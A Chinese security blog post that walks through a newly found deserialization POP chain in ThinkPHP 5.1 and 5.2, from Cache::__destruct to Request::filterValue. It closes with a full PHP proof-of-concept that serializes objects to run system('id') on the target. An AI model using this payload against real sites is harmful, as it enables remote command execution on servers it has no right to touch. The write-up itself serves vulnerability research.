ThinkPHP5.x另一条反序列化利用链

作者：G2602914553 | 来源：互联网 | 2023-09-04 22:32

前几天整体看完Laravel的POP链，顺便想看看Thinkphp的POP链，也有很多师傅都已经分析过了5.x和6.x的反序列化利用链。复现了一个5.1的POP链后，自己尝试挖掘了一下5.2的POP

前几天整体看完Laravel的POP链，顺便想看看Thinkphp的POP链，也有很多师傅都已经分析过了5.x和6.x的反序列化利用链。复现了一个5.1的POP链后，自己尝试挖掘了一下5.2的POP链，发现了一条对于5.1和5.2是通杀的POP链，并且和师傅们找的都不大相同，就把思路分享出来。

分析完了Laravel的，不得不说ThinkPHP可利用的初始类是真的少，__destruct和__wakeup也就那么几个，师傅们大多都是利用thinkprocesspipesWindows类的__destruct，后续再利用__toString继续寻找利用链。

POP链分析

我一开始就换了个初始类，最后在thinkCache找到了些苗头，利用它的__destruct函数。

跟进commit函数，$this->deferred是可控的，save函数参数也就是可控的。

再跟进save函数，$item完全可控，它必须是一个CacheItemInterface对象。

找到thinkcacheCacheItem类，发现$item->getKey(), $item->get(), $item->getExpire()都是可控的。

回到save函数，跟进set函数。

跟进init函数，可以看到，我们将$this->handler设置为任意对象他都会返回。

现在全局搜索含有set函数的类，在thinkcachedriverMemcached找到。

跟进其中的has函数，我们看到$this->handler又是可控的，又可以返回任意对象。

再全局搜索get函数，看到think/Request里面有，分析过最开始的5.1反序列化的POP链的人都知道，最后的RCE点就在这个类。get函数里有input函数，前两个参数完全可控。

进入input函数，想要进入下面的filterData函数且满足第一个参数可控

那么我们进入getData函数，我们知道$data和$name都是可控的，那么getData函数的返回也是可控的。

然后顺利进入filterData函数。

因为getFilter函数中的$this-filter可控，所以getFilter函数也是可控的。

最后进入filterValue函数，终于到了RCE的点了。

最后测试

namespace think{ class Cache{ protected $deferred; protected $handler; function __construct($Memcached, $CacheItem){ $this->handler = $Memcached; $this->deferred = array('' => $CacheItem); } } } namespace thinkcache{ class CacheItem{ protected $key; protected $value; protected $expire; function __construct($name, $value){ $this->key = $name; $this->value = $value; $this->expire = null; } } } namespace thinkcachedriver{ class Memcached{ protected $option; protected $handler; protected $tag = 1; protected $writeTimes = 0; function __construct($Request){ $this->handler = $Request; $this->option = array('prefix'=>''); } } } namespace think{ class Request { protected $filter; protected $get; protected $mergeParam; function __construct(){ $this->filter = "system"; $this->get = array("jrxnm"=>"id"); $this->mergeParam = true; } } } namespace{ $r = new thinkRequest(); $c = new thinkcacheCacheItem('jrxnm', ''); $m = new thinkcachedriverMemcached($r); $b = new thinkCache($m,$c); echo urlencode(serialize($b)); }

总结

找POP链是一个很有意思的事情，那种一环扣一环、利用PHP各种特性最后RCE的POP链是最让人拍案叫绝的。

推荐阅读

utf-8
大类|电阻器_使用Requests、Etree、BeautifulSoup、Pandas和Path库进行数据抓取与处理 | 将指定区域内容保存为HTML和Excel格式

大类|电阻器_使用Requests、Etree、BeautifulSoup、Pandas和Path库进行数据抓取与处理 | 将指定区域内容保存为HTML和Excel格式 ... [详细]

蜡笔小新 2024-11-11 19:05:59
const
Android 源代码解析系列（一）：init.c 文件详解

本文详细解析了 Android 系统启动过程中的核心文件 `init.c`，探讨了其在系统初始化阶段的关键作用。通过对 `init.c` 的源代码进行深入分析，揭示了其如何管理进程、解析配置文件以及执行系统启动脚本。此外，文章还介绍了 `init` 进程的生命周期及其与内核的交互方式，为开发者提供了深入了解 Android 启动机制的宝贵资料。 ... [详细]

蜡笔小新 2024-11-10 00:35:48
shell
Python 伦理黑客技术：深入探讨后门攻击（第三部分）

在《Python 伦理黑客技术：深入探讨后门攻击（第三部分）》中，作者详细分析了后门攻击中的Socket问题。由于TCP协议基于流，难以确定消息批次的结束点，这给后门攻击的实现带来了挑战。为了解决这一问题，文章提出了一系列有效的技术方案，包括使用特定的分隔符和长度前缀，以确保数据包的准确传输和解析。这些方法不仅提高了攻击的隐蔽性和可靠性，还为安全研究人员提供了宝贵的参考。 ... [详细]

蜡笔小新 2024-11-09 16:33:02
const
[c++基础]STL

cppfig15_10.cppincludeincludeusingnamespacestd;templatevoidprintVector(constvector&integer ... [详细]

蜡笔小新 2024-11-13 13:22:43
io
在范围[0..n-1]中产生m个不同的随机数 - Generating m distinct random numbers in the range [0..n-1]

Ihavetwomethodsofgeneratingmdistinctrandomnumbersintherange[0..n-1]我有两种方法在范围[0.n-1]中生 ... [详细]

蜡笔小新 2024-11-13 09:49:14
export
c/c++常用代码doc,ppt,xls文件格式转PDF格式[转]

[转]doc,ppt,xls文件格式转PDF格式http:blog.csdn.netlee353086articledetails7920355确实好用。需要注意的是#import ... [详细]

蜡笔小新 2024-11-12 16:19:40
shell
开机自启动的几种方式

0x01快速自启动目录快速启动目录自启动方式源于Windows中的一个目录，这个目录一般叫启动或者Startup。位于该目录下的PE文件会在开机后进行自启动 ... [详细]

蜡笔小新 2024-11-12 11:16:30
jsp
第二十五天接口、多态

1.java是面向对象的语言。设计模式：接口接口类是从java里衍生出来的，不是python原生支持的主要用于继承里多继承抽象类是python原生支持的主要用于继承里的单继承但是接 ... [详细]

蜡笔小新 2024-11-12 06:43:20
filter
在CentOS 7环境中安装配置Redis及使用Redis Desktop Manager连接时的注意事项与技巧

在 CentOS 7 环境中安装和配置 Redis 时，需要注意一些关键步骤和最佳实践。本文详细介绍了从安装 Redis 到配置其基本参数的全过程，并提供了使用 Redis Desktop Manager 连接 Redis 服务器的技巧和注意事项。此外，还探讨了如何优化性能和确保数据安全，帮助用户在生产环境中高效地管理和使用 Redis。 ... [详细]

蜡笔小新 2024-11-11 18:27:44
jsp
LeetCode 有效回文串 II：深入解析与优化算法

在 LeetCode 的“有效回文串 II”问题中，给定一个非空字符串 `s`，允许删除最多一个字符。本篇深入解析了如何判断删除一个字符后，字符串是否能成为回文串，并提出了高效的优化算法。通过详细的分析和代码实现，本文提供了多种解决方案，帮助读者更好地理解和应用这一算法。 ... [详细]

蜡笔小新 2024-11-11 17:40:42
jsp
【Python 实战：汇率转换器 v1.02】

本项目通过Python编程实现了一个简单的汇率转换器v1.02。主要内容包括：1. Python的基本语法元素：（1）缩进：用于表示代码的层次结构，是Python中定义程序框架的唯一方式；（2）注释：提供开发者说明信息，不参与实际运行，通常每个代码块添加一个注释；（3）常量和变量：用于存储和操作数据，是程序执行过程中的重要组成部分。此外，项目还涉及了函数定义、用户输入处理和异常捕获等高级特性，以确保程序的健壮性和易用性。 ... [详细]

蜡笔小新 2024-11-11 16:34:26
match
DVWA学习笔记系列：深入理解CSRF攻击机制

DVWA学习笔记系列：深入理解CSRF攻击机制 ... [详细]

蜡笔小新 2024-11-11 13:19:51
match
PHP实现MySQL分页查询功能优化与实践

本文探讨了在PHP中实现MySQL分页查询功能的优化方法与实际应用。通过详细分析分页查询的常见问题，提出了多种优化策略，包括使用索引、减少查询字段、合理设置缓存等。文章还提供了一个具体的示例，展示了如何通过优化模型加载和分页参数设置，显著提升查询性能和用户体验。 ... [详细]

蜡笔小新 2024-11-11 12:46:36
jsp
利用Struts1构建简易计算器：采用DispatchAction处理请求，动态Form优化开发流程，提供用户友好的错误提示

本文介绍了如何利用Struts1框架构建一个简易的四则运算计算器。通过采用DispatchAction来处理不同类型的计算请求，并使用动态Form来优化开发流程，确保代码的简洁性和可维护性。同时，系统提供了用户友好的错误提示，以增强用户体验。 ... [详细]

蜡笔小新 2024-11-09 19:48:22
io
理解和优化进程与线程状态转换机制

在Cisco IOS XR系统中，存在提供服务的服务器和使用这些服务的客户端。本文深入探讨了进程与线程状态转换机制，分析了其在系统性能优化中的关键作用，并提出了改进措施，以提高系统的响应速度和资源利用率。通过详细研究状态转换的各个环节，本文为开发人员和系统管理员提供了实用的指导，旨在提升整体系统效率和稳定性。 ... [详细]

蜡笔小新 2024-11-09 18:33:35

G2602914553

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章